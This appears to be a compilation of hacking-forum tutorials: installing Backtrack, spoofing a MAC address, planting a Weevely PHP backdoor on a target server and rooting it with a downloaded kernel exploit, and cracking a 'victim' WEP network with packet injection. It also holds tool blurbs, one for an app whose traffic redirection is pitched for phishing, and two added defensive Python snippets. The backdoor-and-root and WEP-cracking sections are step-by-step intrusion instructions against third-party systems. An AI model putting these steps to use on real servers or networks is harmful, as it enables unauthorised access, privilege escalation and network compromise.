How To Install Backtrack: Dual-Boot Tutorial

Hey guys, today I'll tell you how to make a dual-boot installation of Backtrack.
It's very easy to install Backtrack.
You must have an 80 GB hard disk.
Okay, let's go.

Requirements:
1. Backtrack ISO (bt-gnome32.iso)
2. USB drive (4 GB)
3. Mini Partition Tool
4. Universal USB Installer (UUI)

Okay, after downloading everything you can continue :p
First of all, open Mini Partition Tool and make one 30 GB partition for Backtrack.
Format type = ext4. After making the partition, format it as ext4.

Now that you have downloaded UUI, insert your 4 GB pendrive.
We are using USB and UUI because it's very easy; you can even make a bootable DVD.
Do something like this:

Then click on Create. Remember: it will take around 15 minutes.

Now you have successfully created a bootable USB of Backtrack 5r3 :p

Backtrack needs an ext4-formatted partition, which we have already created.
Now restart your computer. On startup, look for the Boot Menu button (mine is F9),
enter the boot menu and select
Boot From USB

Voila! Backtrack is working. Now select Default Boot Text Mode (something like this), or select the 1st option, which is already selected; just press Enter.
After the console opens, type startx. After Backtrack has fully loaded (the cursor, the task bar and the Backtrack menu appear), you can continue =pP 😀

Now click on the Install Backtrack icon and follow the instructions. When the partition selection screen appears, select Specify Partition Manually.
Tick Specify Partition Manually. It will install in 20 or 30 minutes, so be patient.

After installation, Backtrack will reboot and you have successfully installed Backtrack.
Now whenever you power on your computer you'll have to choose between Backtrack or Windows 🙂

Username is = root
Password is = toor

Enjoy Backtrack, but remember: you have to configure it for the network 😀
Thank you for reading. Comment if you need any help 🙂

How To Make PPPoE Or Dial-Up Connection in Backtrack

Well, I don't want to make this tutorial "long" :v so get your hands ready.

First of all, I am making the dial-up connection in Backtrack 5r3 using VMware Player.

What you have to do is download Backtrack 5r3, or you can use any (I think :S)
Download VMware Player.
Now run Backtrack, but the network mode must be Bridged ~

You have to change the MAC address in Backtrack; use the MAC address of Windows.
CMD => ipconfig /all =>
Physical Address is your MAC address. Write it down somewhere.

For changing the MAC address in Backtrack, read this tutorial ~

After changing your MAC address you can "continue" 😀

Open a terminal, then type

pppoeconf

A screen will pop up; press/click Yes.
Then enter your username.
Enter your password.
Yes yes yes yes yes yes and yes, yes!
Now you have successfully connected to the internet.
Open a terminal, type ping google.com and voila!

Continue 😛 Thank you for reading \m/

How to change Mac Address in Backtrack ?


Well, changing the MAC address in Backtrack is pretty easy.

What Is a MAC Address?

A media access control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in the media access control protocol sublayer of the OSI reference model.

MAC addresses are most often assigned by the manufacturer of a network interface controller (NIC) and are stored in its hardware, such as the card’s read-only memory or some other firmware mechanism. If assigned by the manufacturer, a MAC address usually encodes the manufacturer’s registered identification number and may be referred to as the burned-in address (BIA). It may also be known as an Ethernet hardware address (EHA), hardware address or physical address. This can be contrasted to a programmed address, where the host device issues commands to the NIC to use an arbitrary address. An example is a SOHO router, for which the ISP grants access to only one MAC address (used previously to inserting the router) so the router must use that MAC address on its Internet-facing NIC. Therefore the router administrator configures a MAC address to override the burned-in one.
A network node may have multiple NICs and each must have one unique MAC address per NIC.
MAC addresses are formed according to the rules of one of three numbering name spaces managed by the Institute of Electrical and Electronics Engineers (IEEE): MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names EUI-48 and EUI-64, in which EUI is an abbreviation for Extended Unique Identifier. (Wikipedia)

Now let me tell you how to change the MAC address in Backtrack.
1. Open a console, then type ifconfig eth0 down
2. Now type macchanger -r eth0
3. ifconfig eth0 up
Command 1 disables eth0.
Command 2 generates a random MAC address.
Command 3 enables eth0 again 😀

Change the MAC Address to One of Your Choice
Open a terminal and type:
1. ifconfig eth0 down
2. Type macchanger --mac, then your MAC address written as six colon-separated octets, then the interface. The first octet must be even, because an odd one marks a multicast address and the interface will not accept it. Example:
   macchanger --mac 00:11:22:33:44:55 eth0
3. ifconfig eth0 up

Pretty easy, han? You can msg me if you have any problem 🙂
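
Added example (not part of the original post): a Python check for the MAC-48 format described above, meant to be run before an address is passed to macchanger --mac. It reads the two flag bits in the first octet (multicast and locally administered) and reports the manufacturer prefix (OUI) only for universally administered addresses; the function names are this example's own.

```python
import re

# Six hex octets with one consistent separator (':' or '-').
_MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([:-])(?:[0-9A-Fa-f]{2}\1){4}[0-9A-Fa-f]{2}$")


def parse_mac(text):
    """Parse a MAC-48 string; raise ValueError if it is not six hex octets."""
    text = text.strip()
    if not _MAC_RE.match(text):
        raise ValueError("not a MAC-48 address: %r" % text)
    octets = bytes(int(part, 16) for part in re.split(r"[:-]", text))
    first = octets[0]
    local = bool(first & 0x02)  # U/L bit: set means locally administered
    return {
        "normalized": ":".join("%02x" % o for o in octets),
        "multicast": bool(first & 0x01),  # I/G bit: set means group address
        "locally_administered": local,
        # The manufacturer prefix only means something for universal addresses.
        "oui": None if local else "%02X-%02X-%02X" % tuple(octets[:3]),
    }


def assignable(text):
    """True if an Ethernet interface can take it: valid, unicast, not all-zero."""
    try:
        info = parse_mac(text)
    except ValueError:
        return False
    return not info["multicast"] and info["normalized"] != "00:00:00:00:00:00"


if __name__ == "__main__":
    # Constructed inputs, plus the two addresses that appear elsewhere on this page.
    for candidate in ("00:c0:ca:50:f8:32", "98-FC-11-C9-14-22",
                      "02:11:22:33:44:55", "11:22:33:44:55:66", "11:22:33:44:55"):
        print(candidate, "->", "ok" if assignable(candidate) else "rejected")
```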

Rooting a Server with Weevely

Hi guys,
Today we will learn to root a server with Weevely 🙂
Weevely is a Python script that makes the tiniest backdoor and backconnects to the shell 🙂
You can google it. It's mostly used by people who don't have open ports 🙂
So our tutorial starts from here 😉
First of all, open Weevely 🙂
Now type "./main.py -g -o /root/Desktop/backdoor.php -p r00T"
This command will make a backdoor.php on the Desktop with the password r00T
===========================================================
The next step is to upload our backdoor to the server by shell, and then
type "./main.py -t -u http://www.target.com/uploads/backdoor.php -p r00T"
and it will connect to the server 🙂
===========================================================
Now we have to find the version of the kernel it's using 🙂
To find that, type "uname -a" and it will show you the kernel version.
For example, my kernel version is 2.6.18 2012, so I will find a local root exploit for
the 2.6.18 2012 kernel version 🙂
Rooting depends on local root exploits.
===========================================================
We will use "wget" to download the local root exploit 🙂
First change the directory to /tmp
by typing "cd /tmp/"
and now download the exploit 🙂
Then we have to compile it with this command:
"gcc 2.6.18.c -o KiDSec"
and it will be compiled 🙂
Now chmod 777 KiDSec
by typing "chmod 777 KiDSec"
===========================================================
Now simply run the exploit by typing
./KiDSec
===========================================================
Y0 Server Rooted !!
Now, to check whether the server is rooted, type "id"
and it should say
"uid=(root) gid=(root)"
==========================================================
Thanks For Reading My Tutorial 🙂
./TR4CK3R

Crack WEP Wifi Password

Tools Needed:
  • Backtrack with aircrack-ng installed
  • Wi-Fi adapter capable of injecting packets.

Note: We are not responsible for any illegal attempts.

I am using the Alfa AWUS036H, the most used card, which works perfectly with Backtrack.
Check your wifi compatible lists here.

Step 1:
Run Backtrack and plug in your Wi-Fi adapter.
Open a new konsole and type: ifconfig wlan0 up

Step 2:
wlan0 is the name of the wireless card that I used; yours can be different.
To check all wireless cards that are connected to your system, type: iwconfig

Step 3:
Now set your Wi-Fi adapter to monitor mode.
Monitor mode lets the adapter listen to almost every packet in the air.
To enable monitor mode, type: airmon-ng start (your interface)
Example: airmon-ng start wlan0

Step 4:
A new interface, mon0, has been created.
To check your new interface, type: iwconfig mon0 (as shown in fig.)

Step 5:
Now find a network protected by a WEP key.
To discover surrounding networks, type: airodump-ng mon0

BSSID == MAC address of the AP.
CH == Channel on which the AP is broadcasting.
ESSID == Name broadcast by the AP.
Cipher == Shows the encryption type.

Step 6:
Now check for the network. My victim for this tutorial is "linksys".
To crack its password, or we can say WEP key, you have to capture the victim's data into a file.
We again use the airodump tool to target a specific AP and channel. You must restrict monitoring to a single channel to speed up data capture.
Type: airodump-ng mon0 --bssid (bssid of the target) -c (channel) -w (file name to save)

As my victim is broadcasting on channel 6, with BSSID "98:fc:11:c9:14:22",
I save the captured data as "RHAWEP".
Type: airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP

Step 7:
To crack the password, at least 20,000 packets must be captured. Two methods are used for this purpose.
1st method == Passive attack: wait for the victim to connect to the AP and then start capturing packets. This is a bit slower.
2nd method == Active attack: you make a fake authentication (connect) with the AP by generating and injecting packets. This is the fast method, and the one I am using.
The active method can be done with this command. Type: aireplay-ng -1 3 -a (bssid of the target) (interface)

I am using this command: aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0

Step 8:
After the fake authentication has succeeded, generate and inject ARP packets.
Open a new konsole and type: aireplay-ng -3 -b (bssid of target) -h (MAC address of mon0) (interface)
In my case: aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

If this step was done successfully, you will see a lot of packets in the airodump capture.

Step 9:
Now keep calm and wait for 20,000 packets. It would be much easier if you wait for 80-90K packets.
After getting enough packets, click on the mark present on the terminal.

Step 10:
Open a new konsole and enter the command below to crack the WEP key.
Type: aircrack-ng (name of the file)
In my case I used: aircrack-ng RHAWEP-01.cap
Aircrack will crack the WEP key within a few minutes.

Note:
Once you get the output, remove the colons and you'll get the WEP key.

WiFiKill v1.7 – WiFi EjeCtOr


WiFiKill is an Android application that can disable the internet connection of a device on the same network, that is, any IP address that uses the same router to connect to the internet. It is an alternative to NETCUT for Android. It simply allows you to scan your Wi-Fi network for devices, see their vendor and cut the network connection for specified devices. This way you can get rid of network hoggers. It gives an option to redirect HTTP traffic to a specific IP; this feature can even be used for phishing.

Changelog:
  • fixed the counter bug (I hope for the last time)
  • added an option to redirect HTTP traffic to a specific IP (caution! this may lead to significant CPU load)
  • successful kills are now tagged by a green icon on the left of the IP (this is not 100% correct)


Network Security Toolkit v2.16.0-4104 Released


The Network Security Toolkit is a bootable ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.

The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. An advanced Web User Interface (WUI) is provided for system administration, navigation, automation and configuration of many network and security applications found within the Network Security Toolkit distribution.

In the virtual world, NST can be used as a network security analysis, validation and monitoring tool on enterprise virtual servers hosting virtual machines. Network Security Toolkit also makes an excellent tool to help one with crash recovery troubleshooting scenarios and diagnostics.

Yaptest – Penetration Framework


It is a penetration testing framework that helps automate the boring parts of pentests. Yaptest aims to make it easy for a pentester to automate parts of testing on the fly. This is particularly useful when testing very large networks. Below are some examples of tasks which would be easy to automate using yaptest:
  • Run nikto on anything nmap thinks is an HTTP service
  • Run hydra on every host with TCP port 21 open
  • Attempt to upload a file to any TFTP servers found
  • Run onesixtyone on all hosts that are up
  • Try metasploit’s solaris_kcms_readfile exploit against any hosts running kcmsd
Yaptest is the glue between your favourite tools and the knowledge base gathered during your pentest. It handles all the mundane stuff that can easily be automated and leaves you free to get on with owning boxes demonstrating risk using techniques that yaptest doesn’t know about yet.

Server Analyser : Simple Server Malware Scanner

Server Analyser is a service for detecting and analyzing web-based threats. It currently handles shells, obfuscated JavaScript, executables, iframes and port scans.

Features added:
+ Logging scans
+ Just paste the results ( option 1 )
+ Added new Exploit methods to option 1
+ Latest infections ( will be updated automatically )
+ Added PHP Shell detection exec()/system() etc. ( more will be added soon )
+ The code has been changed into a smaller one
+ Added new BlackHole methods
+ Added different javascript methods
+ Added decoded php syntaxes
+ gzinflate
+ var url
+ base64_decode
+ The Beta has been released and uploaded
+ code improvements
+ fixed the dos2unix issue
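
Added example (not the Server Analyser code, which is not shown on this page): a small Python scanner for the PHP indicators named in the list above (exec()/system(), gzinflate, base64_decode) plus zero-size iframes. The extra function names shell_exec and passthru, the weights, the threshold and both samples are assumptions made for this illustration.

```python
import re

# Lookbehind: skip method calls ($db->exec), static calls (Foo::exec),
# variables and longer names such as curl_exec, which are common false hits.
_CALL = r"(?<![\w$>:])"
# name -> (pattern, weight). Weights and threshold are assumed, not the tool's.
INDICATORS = {
    "command exec": (re.compile(_CALL + r"(?:shell_exec|passthru|exec|system)\s*\(", re.I), 2),
    "gzinflate": (re.compile(_CALL + r"gzinflate\s*\(", re.I), 2),
    "base64_decode": (re.compile(_CALL + r"base64_decode\s*\(", re.I), 1),
    "decode chain": (re.compile(r"gzinflate\s*\(\s*base64_decode\s*\(", re.I), 3),
    "zero-size iframe": (re.compile(r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I), 2),
}
THRESHOLD = 4


def scan(source):
    """Return (score, findings); findings are (line_number, indicator) tuples."""
    score, findings = 0, []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, (pattern, weight) in INDICATORS.items():
            hits = len(pattern.findall(line))
            if hits:
                findings.append((line_no, name))
                score += weight * hits
    return score, findings


def is_suspicious(source):
    """One weak indicator alone (e.g. base64_decode of an image) stays below the bar."""
    return scan(source)[0] >= THRESHOLD


# Constructed samples, not taken from any real site.
BENIGN = '''<?php
$rows = $db->exec("DELETE FROM sessions WHERE expired = 1");
$png = base64_decode($row["thumbnail"]);
curl_exec($handle);
'''
SUSPECT = '''<?php
$code = gzinflate(base64_decode($blob));
system($cmd);
?><iframe src="http://example.invalid/" width="0" height="0"></iframe>
'''

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan(sample), is_suspicious(sample))
```

A scanner like this is meant for writable web directories such as an uploads folder, and a hit is a reason to review the file, not proof of compromise.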